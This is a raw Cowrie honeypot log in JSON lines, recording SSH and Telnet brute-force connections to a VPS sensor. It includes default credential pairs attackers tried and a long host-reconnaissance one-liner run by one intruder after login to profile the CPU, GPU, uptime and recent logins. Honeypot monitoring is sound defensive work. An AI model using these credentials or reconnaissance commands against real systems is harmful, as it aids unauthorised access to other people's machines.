{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":41628,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad9e9f3610bf","protocol":"ssh","message":"New connection: 45.88.8.186:41628 (1.2.3.4:22) [session: ad9e9f3610bf]","sensor":"my-vps","timestamp":"2025-08-24T22:10:39.069248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:10:39.568591Z","src_ip":"45.88.8.186","session":"ad9e9f3610bf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T22:10:39.570065Z","src_ip":"45.88.8.186","session":"ad9e9f3610bf"}
{"eventid":"cowrie.login.success","username":"root","password":"404040","message":"login attempt [root/404040] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:10:42.323907Z","src_ip":"45.88.8.186","session":"ad9e9f3610bf"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:10:43.372907Z","src_ip":"45.88.8.186","session":"ad9e9f3610bf"}
{"eventid":"cowrie.session.connect","src_ip":"160.30.200.25","src_port":34244,"dst_ip":"1.2.3.4","dst_port":23,"session":"f7645c264e8c","protocol":"telnet","message":"New connection: 160.30.200.25:34244 (1.2.3.4:23) [session: f7645c264e8c]","sensor":"my-vps","timestamp":"2025-08-24T22:11:11.155681Z"}
{"eventid":"cowrie.session.connect","src_ip":"114.35.166.153","src_port":35748,"dst_ip":"1.2.3.4","dst_port":23,"session":"a3ef7f075b40","protocol":"telnet","message":"New connection: 114.35.166.153:35748 (1.2.3.4:23) [session: a3ef7f075b40]","sensor":"my-vps","timestamp":"2025-08-24T22:12:07.714355Z"}
{"eventid":"cowrie.login.failed","username":"test","password":"test3","message":"login attempt [test/test3] failed","sensor":"my-vps","timestamp":"2025-08-24T22:12:11.940276Z","src_ip":"160.30.200.25","session":"f7645c264e8c"}
{"eventid":"cowrie.session.closed","duration":60.786832094192505,"message":"Connection lost after 60 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:12:11.942433Z","src_ip":"160.30.200.25","session":"f7645c264e8c"}
{"eventid":"cowrie.session.closed","duration":35.56414747238159,"message":"Connection lost after 35 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:12:43.278432Z","src_ip":"114.35.166.153","session":"a3ef7f075b40"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":60076,"dst_ip":"1.2.3.4","dst_port":23,"session":"35886683e293","protocol":"telnet","message":"New connection: 182.112.31.188:60076 (1.2.3.4:23) [session: 35886683e293]","sensor":"my-vps","timestamp":"2025-08-24T22:14:06.769212Z"}
{"eventid":"cowrie.session.closed","duration":12.708524703979492,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:14:19.477642Z","src_ip":"182.112.31.188","session":"35886683e293"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":60404,"dst_ip":"1.2.3.4","dst_port":23,"session":"e1c6f2d94723","protocol":"telnet","message":"New connection: 182.112.31.188:60404 (1.2.3.4:23) [session: e1c6f2d94723]","sensor":"my-vps","timestamp":"2025-08-24T22:14:19.694626Z"}
{"eventid":"cowrie.session.closed","duration":12.812226057052612,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:14:32.506778Z","src_ip":"182.112.31.188","session":"e1c6f2d94723"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":60686,"dst_ip":"1.2.3.4","dst_port":23,"session":"9c9f008a2997","protocol":"telnet","message":"New connection: 182.112.31.188:60686 (1.2.3.4:23) [session: 9c9f008a2997]","sensor":"my-vps","timestamp":"2025-08-24T22:14:32.699162Z"}
{"eventid":"cowrie.session.closed","duration":12.808223009109497,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:14:45.507323Z","src_ip":"182.112.31.188","session":"9c9f008a2997"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":32770,"dst_ip":"1.2.3.4","dst_port":23,"session":"2735a29b98b9","protocol":"telnet","message":"New connection: 182.112.31.188:32770 (1.2.3.4:23) [session: 2735a29b98b9]","sensor":"my-vps","timestamp":"2025-08-24T22:14:45.671502Z"}
{"eventid":"cowrie.session.closed","duration":12.87309455871582,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:14:58.544526Z","src_ip":"182.112.31.188","session":"2735a29b98b9"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":33053,"dst_ip":"1.2.3.4","dst_port":23,"session":"eb729b161d1f","protocol":"telnet","message":"New connection: 182.112.31.188:33053 (1.2.3.4:23) [session: eb729b161d1f]","sensor":"my-vps","timestamp":"2025-08-24T22:14:58.793506Z"}
{"eventid":"cowrie.session.closed","duration":12.758287191390991,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:15:11.551606Z","src_ip":"182.112.31.188","session":"eb729b161d1f"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":33374,"dst_ip":"1.2.3.4","dst_port":23,"session":"32c16261822d","protocol":"telnet","message":"New connection: 182.112.31.188:33374 (1.2.3.4:23) [session: 32c16261822d]","sensor":"my-vps","timestamp":"2025-08-24T22:15:11.675911Z"}
{"eventid":"cowrie.session.closed","duration":12.794539451599121,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:15:24.470383Z","src_ip":"182.112.31.188","session":"32c16261822d"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":33679,"dst_ip":"1.2.3.4","dst_port":23,"session":"d01e09b81422","protocol":"telnet","message":"New connection: 182.112.31.188:33679 (1.2.3.4:23) [session: d01e09b81422]","sensor":"my-vps","timestamp":"2025-08-24T22:15:24.614580Z"}
{"eventid":"cowrie.session.closed","duration":12.888057470321655,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:15:37.502571Z","src_ip":"182.112.31.188","session":"d01e09b81422"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65190,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbf9e91b0d73","protocol":"ssh","message":"New connection: 217.72.205.35:65190 (1.2.3.4:22) [session: dbf9e91b0d73]","sensor":"my-vps","timestamp":"2025-08-24T22:15:37.575531Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:15:37.576746Z","src_ip":"217.72.205.35","session":"dbf9e91b0d73"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":33993,"dst_ip":"1.2.3.4","dst_port":23,"session":"fe4c878ae775","protocol":"telnet","message":"New connection: 182.112.31.188:33993 (1.2.3.4:23) [session: fe4c878ae775]","sensor":"my-vps","timestamp":"2025-08-24T22:15:37.675431Z"}
{"eventid":"cowrie.session.closed","duration":12.801823854446411,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:15:50.477182Z","src_ip":"182.112.31.188","session":"fe4c878ae775"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":34307,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d1e70676bdc","protocol":"telnet","message":"New connection: 182.112.31.188:34307 (1.2.3.4:23) [session: 4d1e70676bdc]","sensor":"my-vps","timestamp":"2025-08-24T22:15:50.676867Z"}
{"eventid":"cowrie.session.closed","duration":12.827015161514282,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:16:03.503820Z","src_ip":"182.112.31.188","session":"4d1e70676bdc"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":34624,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f1b1846e1c3","protocol":"telnet","message":"New connection: 182.112.31.188:34624 (1.2.3.4:23) [session: 1f1b1846e1c3]","sensor":"my-vps","timestamp":"2025-08-24T22:16:03.684157Z"}
{"eventid":"cowrie.session.closed","duration":12.772073030471802,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:16:16.456131Z","src_ip":"182.112.31.188","session":"1f1b1846e1c3"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":34932,"dst_ip":"1.2.3.4","dst_port":23,"session":"8891481e382a","protocol":"telnet","message":"New connection: 182.112.31.188:34932 (1.2.3.4:23) [session: 8891481e382a]","sensor":"my-vps","timestamp":"2025-08-24T22:16:16.711613Z"}
{"eventid":"cowrie.session.closed","duration":12.804386377334595,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:16:29.515918Z","src_ip":"182.112.31.188","session":"8891481e382a"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":35258,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b1fb78a68fb","protocol":"telnet","message":"New connection: 182.112.31.188:35258 (1.2.3.4:23) [session: 2b1fb78a68fb]","sensor":"my-vps","timestamp":"2025-08-24T22:16:29.639952Z"}
{"eventid":"cowrie.session.closed","duration":12.828346014022827,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:16:42.468226Z","src_ip":"182.112.31.188","session":"2b1fb78a68fb"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":35566,"dst_ip":"1.2.3.4","dst_port":23,"session":"07f7158b07c6","protocol":"telnet","message":"New connection: 182.112.31.188:35566 (1.2.3.4:23) [session: 07f7158b07c6]","sensor":"my-vps","timestamp":"2025-08-24T22:16:42.689284Z"}
{"eventid":"cowrie.session.closed","duration":12.844157934188843,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:16:55.533372Z","src_ip":"182.112.31.188","session":"07f7158b07c6"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":35893,"dst_ip":"1.2.3.4","dst_port":23,"session":"39cc4cf55755","protocol":"telnet","message":"New connection: 182.112.31.188:35893 (1.2.3.4:23) [session: 39cc4cf55755]","sensor":"my-vps","timestamp":"2025-08-24T22:16:55.664514Z"}
{"eventid":"cowrie.session.closed","duration":12.82206416130066,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:17:08.486514Z","src_ip":"182.112.31.188","session":"39cc4cf55755"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":36188,"dst_ip":"1.2.3.4","dst_port":23,"session":"542a73042414","protocol":"telnet","message":"New connection: 182.112.31.188:36188 (1.2.3.4:23) [session: 542a73042414]","sensor":"my-vps","timestamp":"2025-08-24T22:17:08.675037Z"}
{"eventid":"cowrie.session.closed","duration":12.84877872467041,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:17:21.523719Z","src_ip":"182.112.31.188","session":"542a73042414"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":36493,"dst_ip":"1.2.3.4","dst_port":23,"session":"de5cc2e19e8d","protocol":"telnet","message":"New connection: 182.112.31.188:36493 (1.2.3.4:23) [session: de5cc2e19e8d]","sensor":"my-vps","timestamp":"2025-08-24T22:17:21.705023Z"}
{"eventid":"cowrie.session.closed","duration":12.804399967193604,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:17:34.509326Z","src_ip":"182.112.31.188","session":"de5cc2e19e8d"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":36798,"dst_ip":"1.2.3.4","dst_port":23,"session":"ace856a4932a","protocol":"telnet","message":"New connection: 182.112.31.188:36798 (1.2.3.4:23) [session: ace856a4932a]","sensor":"my-vps","timestamp":"2025-08-24T22:17:34.723277Z"}
{"eventid":"cowrie.session.closed","duration":12.729443550109863,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:17:47.452657Z","src_ip":"182.112.31.188","session":"ace856a4932a"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":37125,"dst_ip":"1.2.3.4","dst_port":23,"session":"01df057c2300","protocol":"telnet","message":"New connection: 182.112.31.188:37125 (1.2.3.4:23) [session: 01df057c2300]","sensor":"my-vps","timestamp":"2025-08-24T22:17:47.680797Z"}
{"eventid":"cowrie.session.closed","duration":12.851866722106934,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:18:00.532593Z","src_ip":"182.112.31.188","session":"01df057c2300"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":37432,"dst_ip":"1.2.3.4","dst_port":23,"session":"c396320ed782","protocol":"telnet","message":"New connection: 182.112.31.188:37432 (1.2.3.4:23) [session: c396320ed782]","sensor":"my-vps","timestamp":"2025-08-24T22:18:00.715394Z"}
{"eventid":"cowrie.session.closed","duration":12.702746391296387,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:18:13.418068Z","src_ip":"182.112.31.188","session":"c396320ed782"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":37746,"dst_ip":"1.2.3.4","dst_port":23,"session":"742b90ab36e1","protocol":"telnet","message":"New connection: 182.112.31.188:37746 (1.2.3.4:23) [session: 742b90ab36e1]","sensor":"my-vps","timestamp":"2025-08-24T22:18:13.597242Z"}
{"eventid":"cowrie.session.closed","duration":12.826934576034546,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:18:26.424083Z","src_ip":"182.112.31.188","session":"742b90ab36e1"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":38067,"dst_ip":"1.2.3.4","dst_port":23,"session":"7459ee5223f6","protocol":"telnet","message":"New connection: 182.112.31.188:38067 (1.2.3.4:23) [session: 7459ee5223f6]","sensor":"my-vps","timestamp":"2025-08-24T22:18:26.624587Z"}
{"eventid":"cowrie.session.closed","duration":12.858062982559204,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:18:39.482551Z","src_ip":"182.112.31.188","session":"7459ee5223f6"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":38384,"dst_ip":"1.2.3.4","dst_port":23,"session":"8e99dc66e6f4","protocol":"telnet","message":"New connection: 182.112.31.188:38384 (1.2.3.4:23) [session: 8e99dc66e6f4]","sensor":"my-vps","timestamp":"2025-08-24T22:18:39.662513Z"}
{"eventid":"cowrie.session.closed","duration":12.80941915512085,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:18:52.471824Z","src_ip":"182.112.31.188","session":"8e99dc66e6f4"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":38695,"dst_ip":"1.2.3.4","dst_port":23,"session":"c9c422806aea","protocol":"telnet","message":"New connection: 182.112.31.188:38695 (1.2.3.4:23) [session: c9c422806aea]","sensor":"my-vps","timestamp":"2025-08-24T22:18:52.666469Z"}
{"eventid":"cowrie.session.closed","duration":12.78075385093689,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:19:05.447144Z","src_ip":"182.112.31.188","session":"c9c422806aea"}
{"eventid":"cowrie.session.connect","src_ip":"182.112.31.188","src_port":38995,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c9d55ffbf36","protocol":"telnet","message":"New connection: 182.112.31.188:38995 (1.2.3.4:23) [session: 2c9d55ffbf36]","sensor":"my-vps","timestamp":"2025-08-24T22:19:05.675776Z"}
{"eventid":"cowrie.session.closed","duration":12.685020208358765,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:19:18.360725Z","src_ip":"182.112.31.188","session":"2c9d55ffbf36"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":43656,"dst_ip":"1.2.3.4","dst_port":22,"session":"7871408a5bfa","protocol":"ssh","message":"New connection: 196.251.115.108:43656 (1.2.3.4:22) [session: 7871408a5bfa]","sensor":"my-vps","timestamp":"2025-08-24T22:19:39.834839Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:19:39.853237Z","src_ip":"196.251.115.108","session":"7871408a5bfa"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":37446,"dst_ip":"1.2.3.4","dst_port":22,"session":"85bb5365edd5","protocol":"ssh","message":"New connection: 196.251.115.108:37446 (1.2.3.4:22) [session: 85bb5365edd5]","sensor":"my-vps","timestamp":"2025-08-24T22:20:22.707057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:20:23.439667Z","src_ip":"196.251.115.108","session":"85bb5365edd5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:20:23.440693Z","src_ip":"196.251.115.108","session":"85bb5365edd5"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T22:20:27.289502Z","src_ip":"196.251.115.108","session":"85bb5365edd5"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:20:28.362917Z","src_ip":"196.251.115.108","session":"85bb5365edd5"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":50774,"dst_ip":"1.2.3.4","dst_port":22,"session":"662c40122102","protocol":"ssh","message":"New connection: 196.251.115.108:50774 (1.2.3.4:22) [session: 662c40122102]","sensor":"my-vps","timestamp":"2025-08-24T22:21:27.030568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:21:27.369137Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:21:27.369974Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.session.connect","src_ip":"36.226.180.253","src_port":40633,"dst_ip":"1.2.3.4","dst_port":23,"session":"167d19880fb8","protocol":"telnet","message":"New connection: 36.226.180.253:40633 (1.2.3.4:23) [session: 167d19880fb8]","sensor":"my-vps","timestamp":"2025-08-24T22:21:28.088984Z"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.088136Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T22:21:30.165560Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.166160Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.166864Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.168008Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.169102Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.170220Z","src_ip":"196.251.115.108","session":"662c40122102"}
